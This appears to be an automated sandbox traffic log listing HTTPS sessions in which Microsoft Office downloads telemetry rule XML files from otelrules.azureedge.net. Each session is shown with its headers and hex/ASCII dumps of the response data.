                                                                                                                                                                                                                                                                            2024-12-03 17:59:33 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                                                                            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                                                                            2024-12-03 17:59:33 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                                                                            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            38192.168.2.44986313.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:33 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:33 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:33 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                            Content-Length: 218853
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public
                                                                                                                                                                                                                                                                            Last-Modified: Mon, 02 Dec 2024 13:20:33 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DD12D41A424BC1"
                                                                                                                                                                                                                                                                            x-ms-request-id: 300ecd5c-a01e-0050-4036-45db6e000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175933Z-174f7845968jrjrxhC1EWRmmrs00000016dg00000000c1uk
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:33 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                                            2024-12-03 17:59:34 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                            Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                                                                                            2024-12-03 17:59:34 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                            Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                                                                                            2024-12-03 17:59:34 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                                                                                            Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                                                                                            2024-12-03 17:59:34 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                            Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                                                                                            2024-12-03 17:59:34 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                                                                                            Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                                                                                            2024-12-03 17:59:34 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                                                                                            Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                                                                                            2024-12-03 17:59:34 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                                                                                            Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                                                                                            2024-12-03 17:59:34 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                                                                                            2024-12-03 17:59:34 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            39192.168.2.44987913.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:36 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:36 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 450
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                            x-ms-request-id: e0d2e361-601e-00ab-06d4-4366f4000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175936Z-174f7845968cdxdrhC1EWRg0en000000163g00000000wxe9
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:36 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            40192.168.2.44988113.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:36 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:36 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 2160
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                            x-ms-request-id: d2130280-a01e-006f-03c7-4313cd000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175936Z-174f7845968psccphC1EWRuz9s00000016mg000000003cds
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:36 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            41192.168.2.44988213.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:36 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:36 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                                            x-ms-request-id: fd738bf4-c01e-008d-7a0f-412eec000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175936Z-174f7845968pght8hC1EWRyvxg00000009ag00000000s50y
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:36 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


